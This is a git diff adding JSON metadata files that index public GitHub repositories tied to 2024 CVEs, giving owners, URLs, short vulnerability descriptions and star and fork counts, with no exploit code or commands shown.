+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0566.json b/2024/CVE-2024-0566.json
new file mode 100644
index 0000000000..d748f53c4f
--- /dev/null
+++ b/2024/CVE-2024-0566.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798394582,
+ "name": "CVE-2024-0566",
+ "full_name": "xbz0n\/CVE-2024-0566",
+ "owner": {
+ "login": "xbz0n",
+ "id": 40547674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4",
+ "html_url": "https:\/\/github.com\/xbz0n"
+ },
+ "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-0566",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-09T17:30:24Z",
+ "updated_at": "2024-05-09T17:35:02Z",
+ "pushed_at": "2024-05-09T17:35:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0582.json b/2024/CVE-2024-0582.json
new file mode 100644
index 0000000000..a0a2c4d5d6
--- /dev/null
+++ b/2024/CVE-2024-0582.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 779314046,
+ "name": "io_uring_LPE-CVE-2024-0582",
+ "full_name": "ysanatomic\/io_uring_LPE-CVE-2024-0582",
+ "owner": {
+ "login": "ysanatomic",
+ "id": 41269324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4",
+ "html_url": "https:\/\/github.com\/ysanatomic"
+ },
+ "html_url": "https:\/\/github.com\/ysanatomic\/io_uring_LPE-CVE-2024-0582",
+ "description": "LPE exploit for CVE-2024-0582 (io_uring)",
+ "fork": false,
+ "created_at": "2024-03-29T14:45:22Z",
+ "updated_at": "2024-06-21T00:12:16Z",
+ "pushed_at": "2024-03-29T16:05:31Z",
+ "stargazers_count": 83,
+ "watchers_count": 83,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 83,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 782584156,
+ "name": "CVE-2024-0582",
+ "full_name": "Forsaken0129\/CVE-2024-0582",
+ "owner": {
+ "login": "Forsaken0129",
+ "id": 37268525,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37268525?v=4",
+ "html_url": "https:\/\/github.com\/Forsaken0129"
+ },
+ "html_url": "https:\/\/github.com\/Forsaken0129\/CVE-2024-0582",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-05T15:39:48Z",
+ "updated_at": "2024-04-05T15:39:48Z",
+ "pushed_at": "2024-04-05T17:32:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806818257,
+ "name": "cve-2024-0582",
+ "full_name": "0ptyx\/cve-2024-0582",
+ "owner": {
+ "login": "0ptyx",
+ "id": 88157475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88157475?v=4",
+ "html_url": "https:\/\/github.com\/0ptyx"
+ },
+ "html_url": "https:\/\/github.com\/0ptyx\/cve-2024-0582",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-28T01:06:48Z",
+ "updated_at": "2024-05-28T11:15:05Z",
+ "pushed_at": "2024-05-28T11:15:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0679.json b/2024/CVE-2024-0679.json
new file mode 100644
index 0000000000..953b6cdf4c
--- /dev/null
+++ b/2024/CVE-2024-0679.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 745696785,
+ "name": "CVE-2024-0679",
+ "full_name": "RandomRobbieBF\/CVE-2024-0679",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-0679",
+ "description": "ColorMag <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation",
+ "fork": false,
+ "created_at": "2024-01-19T22:30:51Z",
+ "updated_at": "2024-01-20T05:08:55Z",
+ "pushed_at": "2024-01-19T22:36:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-0679",
+ "exploit",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0684.json b/2024/CVE-2024-0684.json
new file mode 100644
index 0000000000..751110c662
--- /dev/null
+++ b/2024/CVE-2024-0684.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 731901174,
+ "name": "writeup_split",
+ "full_name": "Valentin-Metz\/writeup_split",
+ "owner": {
+ "login": "Valentin-Metz",
+ "id": 31850924,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31850924?v=4",
+ "html_url": "https:\/\/github.com\/Valentin-Metz"
+ },
+ "html_url": "https:\/\/github.com\/Valentin-Metz\/writeup_split",
+ "description": "Writeup of a heap overflow vulnerability in the GNU coreutils split program. CVE-2024-0684",
+ "fork": false,
+ "created_at": "2023-12-15T06:33:15Z",
+ "updated_at": "2024-06-16T16:25:09Z",
+ "pushed_at": "2024-01-20T09:31:20Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "binary-exploitation",
+ "pwn",
+ "writeup"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0710.json b/2024/CVE-2024-0710.json
new file mode 100644
index 0000000000..f9588a094c
--- /dev/null
+++ b/2024/CVE-2024-0710.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 784606066,
+ "name": "CVE-2024-0710",
+ "full_name": "karlemilnikka\/CVE-2024-0710",
+ "owner": {
+ "login": "karlemilnikka",
+ "id": 20514810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4",
+ "html_url": "https:\/\/github.com\/karlemilnikka"
+ },
+ "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-0710",
+ "description": "Unauthenticated Form Submission Unique ID Modification",
+ "fork": false,
+ "created_at": "2024-04-10T07:23:11Z",
+ "updated_at": "2024-04-10T07:23:12Z",
+ "pushed_at": "2024-04-18T13:42:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0713.json b/2024/CVE-2024-0713.json
new file mode 100644
index 0000000000..80b1cd9c3b
--- /dev/null
+++ b/2024/CVE-2024-0713.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770828784,
+ "name": "CVE-2024-0713",
+ "full_name": "kitodd\/CVE-2024-0713",
+ "owner": {
+ "login": "kitodd",
+ "id": 158980530,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158980530?v=4",
+ "html_url": "https:\/\/github.com\/kitodd"
+ },
+ "html_url": "https:\/\/github.com\/kitodd\/CVE-2024-0713",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-12T08:32:26Z",
+ "updated_at": "2024-03-12T08:32:26Z",
+ "pushed_at": "2024-03-12T08:32:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0757.json b/2024/CVE-2024-0757.json
new file mode 100644
index 0000000000..a4538906b5
--- /dev/null
+++ b/2024/CVE-2024-0757.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 816179994,
+ "name": "CVE-2024-0757-Exploit",
+ "full_name": "hunThubSpace\/CVE-2024-0757-Exploit",
+ "owner": {
+ "login": "hunThubSpace",
+ "id": 49031710,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49031710?v=4",
+ "html_url": "https:\/\/github.com\/hunThubSpace"
+ },
+ "html_url": "https:\/\/github.com\/hunThubSpace\/CVE-2024-0757-Exploit",
+ "description": "A PoC Exploit for CVE-2024-0757 - Insert or Embed Articulate Content into WordPress Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2024-06-17T07:46:21Z",
+ "updated_at": "2024-06-26T05:08:27Z",
+ "pushed_at": "2024-06-18T14:12:08Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "cve",
+ "ethical-hacking",
+ "exploit",
+ "penetration-testing",
+ "web"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0783.json b/2024/CVE-2024-0783.json
new file mode 100644
index 0000000000..a1418929e1
--- /dev/null
+++ b/2024/CVE-2024-0783.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 746234103,
+ "name": "Online-Admission-System-RCE-PoC",
+ "full_name": "keru6k\/Online-Admission-System-RCE-PoC",
+ "owner": {
+ "login": "keru6k",
+ "id": 73579653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4",
+ "html_url": "https:\/\/github.com\/keru6k"
+ },
+ "html_url": "https:\/\/github.com\/keru6k\/Online-Admission-System-RCE-PoC",
+ "description": "projectworlds' Online Admission System RCE vulnerability PoC, Categorized as CVE-2024-0783",
+ "fork": false,
+ "created_at": "2024-01-21T13:26:09Z",
+ "updated_at": "2024-01-23T12:52:02Z",
+ "pushed_at": "2024-01-21T13:29:42Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-0783"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0844.json b/2024/CVE-2024-0844.json
new file mode 100644
index 0000000000..6ac45a7dcd
--- /dev/null
+++ b/2024/CVE-2024-0844.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737576469,
+ "name": "CVE-2024-0844",
+ "full_name": "0x9567b\/CVE-2024-0844",
+ "owner": {
+ "login": "0x9567b",
+ "id": 72038577,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72038577?v=4",
+ "html_url": "https:\/\/github.com\/0x9567b"
+ },
+ "html_url": "https:\/\/github.com\/0x9567b\/CVE-2024-0844",
+ "description": "CVE-2024-0844 - Popup More <= 2.2.4 - Authenticated (Admin+) Directory Traversal to Limited Local File Inclusion",
+ "fork": false,
+ "created_at": "2023-12-31T15:36:51Z",
+ "updated_at": "2024-01-26T09:28:21Z",
+ "pushed_at": "2024-03-31T18:47:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0986.json b/2024/CVE-2024-0986.json
new file mode 100644
index 0000000000..fc1336ae58
--- /dev/null
+++ b/2024/CVE-2024-0986.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 787180944,
+ "name": "Issabel-PBX-4.0.0-RCE-Authenticated",
+ "full_name": "gunzf0x\/Issabel-PBX-4.0.0-RCE-Authenticated",
+ "owner": {
+ "login": "gunzf0x",
+ "id": 31874167,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4",
+ "html_url": "https:\/\/github.com\/gunzf0x"
+ },
+ "html_url": "https:\/\/github.com\/gunzf0x\/Issabel-PBX-4.0.0-RCE-Authenticated",
+ "description": "Issabel PBX 4.0.0 Remote Code Execution (Authenticated) - CVE-2024-0986",
+ "fork": false,
+ "created_at": "2024-04-16T03:24:25Z",
+ "updated_at": "2024-04-17T16:10:59Z",
+ "pushed_at": "2024-04-19T02:26:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-0986",
+ "issabel-pbx",
+ "rce",
+ "rce-exploit"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1071.json b/2024/CVE-2024-1071.json
new file mode 100644
index 0000000000..d0b9944f08
--- /dev/null
+++ b/2024/CVE-2024-1071.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 764046735,
+ "name": "CVE-2024-1071",
+ "full_name": "gbrsh\/CVE-2024-1071",
+ "owner": {
+ "login": "gbrsh",
+ "id": 36970331,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4",
+ "html_url": "https:\/\/github.com\/gbrsh"
+ },
+ "html_url": "https:\/\/github.com\/gbrsh\/CVE-2024-1071",
+ "description": "Ultimate Member Unauthorized Database Access \/ SQLi",
+ "fork": false,
+ "created_at": "2024-02-27T11:41:53Z",
+ "updated_at": "2024-04-18T17:23:43Z",
+ "pushed_at": "2024-02-27T11:45:50Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 767118935,
+ "name": "CVE-2024-1071-Docker",
+ "full_name": "Trackflaw\/CVE-2024-1071-Docker",
+ "owner": {
+ "login": "Trackflaw",
+ "id": 78696986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4",
+ "html_url": "https:\/\/github.com\/Trackflaw"
+ },
+ "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-1071-Docker",
+ "description": "CVE-2024-1071 with Docker",
+ "fork": false,
+ "created_at": "2024-03-04T18:29:17Z",
+ "updated_at": "2024-03-04T18:34:59Z",
+ "pushed_at": "2024-03-05T18:35:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 773939193,
+ "name": "CVE-2024-1071",
+ "full_name": "Matrexdz\/CVE-2024-1071",
+ "owner": {
+ "login": "Matrexdz",
+ "id": 161771152,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161771152?v=4",
+ "html_url": "https:\/\/github.com\/Matrexdz"
+ },
+ "html_url": "https:\/\/github.com\/Matrexdz\/CVE-2024-1071",
+ "description": "CVE-2024-1071",
+ "fork": false,
+ "created_at": "2024-03-18T16:58:46Z",
+ "updated_at": "2024-03-18T17:12:07Z",
+ "pushed_at": "2024-03-18T17:04:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 773943544,
+ "name": "CVE-2024-1071-Docker",
+ "full_name": "Matrexdz\/CVE-2024-1071-Docker",
+ "owner": {
+ "login": "Matrexdz",
+ "id": 161771152,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161771152?v=4",
+ "html_url": "https:\/\/github.com\/Matrexdz"
+ },
+ "html_url": "https:\/\/github.com\/Matrexdz\/CVE-2024-1071-Docker",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-18T17:07:27Z",
+ "updated_at": "2024-03-18T17:12:06Z",
+ "pushed_at": "2024-03-18T17:09:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1086.json b/2024/CVE-2024-1086.json
new file mode 100644
index 0000000000..cab55d8f9a
--- /dev/null
+++ b/2024/CVE-2024-1086.json
@@ -0,0 +1,158 @@
+[
+ {
+ "id": 775151369,
+ "name": "CVE-2024-1086",
+ "full_name": "Notselwyn\/CVE-2024-1086",
+ "owner": {
+ "login": "Notselwyn",
+ "id": 68616630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68616630?v=4",
+ "html_url": "https:\/\/github.com\/Notselwyn"
+ },
+ "html_url": "https:\/\/github.com\/Notselwyn\/CVE-2024-1086",
+ "description": "Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.",
+ "fork": false,
+ "created_at": "2024-03-20T21:16:41Z",
+ "updated_at": "2024-06-25T23:09:47Z",
+ "pushed_at": "2024-04-17T16:09:54Z",
+ "stargazers_count": 2146,
+ "watchers_count": 2146,
+ "has_discussions": false,
+ "forks_count": 281,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-1086",
+ "exploit",
+ "lpe",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 281,
+ "watchers": 2146,
+ "score": 0,
+ "subscribers_count": 24
+ },
+ {
+ "id": 781477717,
+ "name": "docker-POC_CVE-2024-1086",
+ "full_name": "Alicey0719\/docker-POC_CVE-2024-1086",
+ "owner": {
+ "login": "Alicey0719",
+ "id": 54524362,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54524362?v=4",
+ "html_url": "https:\/\/github.com\/Alicey0719"
+ },
+ "html_url": "https:\/\/github.com\/Alicey0719\/docker-POC_CVE-2024-1086",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-03T13:09:22Z",
+ "updated_at": "2024-06-18T07:54:41Z",
+ "pushed_at": "2024-05-19T06:51:46Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 794185753,
+ "name": "CVE-2024-1086",
+ "full_name": "CCIEVoice2009\/CVE-2024-1086",
+ "owner": {
+ "login": "CCIEVoice2009",
+ "id": 71173516,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71173516?v=4",
+ "html_url": "https:\/\/github.com\/CCIEVoice2009"
+ },
+ "html_url": "https:\/\/github.com\/CCIEVoice2009\/CVE-2024-1086",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-30T16:10:37Z",
+ "updated_at": "2024-04-30T16:13:05Z",
+ "pushed_at": "2024-04-30T16:13:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810010339,
+ "name": "CVE-2024-1086-checker",
+ "full_name": "kevcooper\/CVE-2024-1086-checker",
+ "owner": {
+ "login": "kevcooper",
+ "id": 6468064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6468064?v=4",
+ "html_url": "https:\/\/github.com\/kevcooper"
+ },
+ "html_url": "https:\/\/github.com\/kevcooper\/CVE-2024-1086-checker",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-03T22:04:03Z",
+ "updated_at": "2024-06-10T17:13:10Z",
+ "pushed_at": "2024-06-10T17:13:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813156753,
+ "name": "CVE-2024-1086",
+ "full_name": "feely666\/CVE-2024-1086",
+ "owner": {
+ "login": "feely666",
+ "id": 35380145,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35380145?v=4",
+ "html_url": "https:\/\/github.com\/feely666"
+ },
+ "html_url": "https:\/\/github.com\/feely666\/CVE-2024-1086",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-10T15:19:39Z",
+ "updated_at": "2024-06-10T15:25:31Z",
+ "pushed_at": "2024-06-10T15:25:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1208.json b/2024/CVE-2024-1208.json
new file mode 100644
index 0000000000..cca0f7e50d
--- /dev/null
+++ b/2024/CVE-2024-1208.json
@@ -0,0 +1,73 @@
+[
+ {
+ "id": 753221507,
+ "name": "CVE-2024-1208-and-CVE-2024-1210",
+ "full_name": "karlemilnikka\/CVE-2024-1208-and-CVE-2024-1210",
+ "owner": {
+ "login": "karlemilnikka",
+ "id": 20514810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4",
+ "html_url": "https:\/\/github.com\/karlemilnikka"
+ },
+ "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-1208-and-CVE-2024-1210",
+ "description": "Sensitive Information Exposure via API in LearnDash.",
+ "fork": false,
+ "created_at": "2024-02-05T17:46:41Z",
+ "updated_at": "2024-03-04T17:31:59Z",
+ "pushed_at": "2024-02-05T17:58:05Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808264498,
+ "name": "CVE-2024-1208",
+ "full_name": "Cappricio-Securities\/CVE-2024-1208",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-1208",
+ "description": "LearnDash LMS < 4.10.3 - Sensitive Information Exposure",
+ "fork": false,
+ "created_at": "2024-05-30T17:55:45Z",
+ "updated_at": "2024-06-24T09:52:57Z",
+ "pushed_at": "2024-06-24T09:52:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "bugbounty-tool",
+ "bugbounty-tools",
+ "cve-2024-1208",
+ "cve-2024-1208-exploit",
+ "cve-2024-1208-poc",
+ "cve-2024-1208-scanner",
+ "learndash-lms",
+ "learndash-lms-4-10-3-exploit",
+ "sensitive-information-exposure"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1209.json b/2024/CVE-2024-1209.json
new file mode 100644
index 0000000000..496a1af611
--- /dev/null
+++ b/2024/CVE-2024-1209.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753219299,
+ "name": "CVE-2024-1209",
+ "full_name": "karlemilnikka\/CVE-2024-1209",
+ "owner": {
+ "login": "karlemilnikka",
+ "id": 20514810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4",
+ "html_url": "https:\/\/github.com\/karlemilnikka"
+ },
+ "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-1209",
+ "description": "Sensitive Information Exposure via assignments in LearnDash. ",
+ "fork": false,
+ "created_at": "2024-02-05T17:41:47Z",
+ "updated_at": "2024-04-02T03:25:31Z",
+ "pushed_at": "2024-02-05T17:56:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1212.json b/2024/CVE-2024-1212.json
new file mode 100644
index 0000000000..7905e6cdb5
--- /dev/null
+++ b/2024/CVE-2024-1212.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 774632757,
+ "name": "CVE-2024-1212",
+ "full_name": "Chocapikk\/CVE-2024-1212",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-1212",
+ "description": "Unauthenticated Command Injection In Progress Kemp LoadMaster",
+ "fork": false,
+ "created_at": "2024-03-19T22:23:18Z",
+ "updated_at": "2024-03-24T14:39:49Z",
+ "pushed_at": "2024-03-19T22:25:21Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1269.json b/2024/CVE-2024-1269.json
new file mode 100644
index 0000000000..0cd478e5eb
--- /dev/null
+++ b/2024/CVE-2024-1269.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758902920,
+ "name": "CVE-2024-1269",
+ "full_name": "sajaljat\/CVE-2024-1269",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-1269",
+ "description": "(XSS)",
+ "fork": false,
+ "created_at": "2024-02-17T12:21:17Z",
+ "updated_at": "2024-02-17T12:21:18Z",
+ "pushed_at": "2024-02-17T12:21:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-12883.json b/2024/CVE-2024-12883.json
new file mode 100644
index 0000000000..6a36b5bcfa
--- /dev/null
+++ b/2024/CVE-2024-12883.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 772273310,
+ "name": "cve-2024-12883",
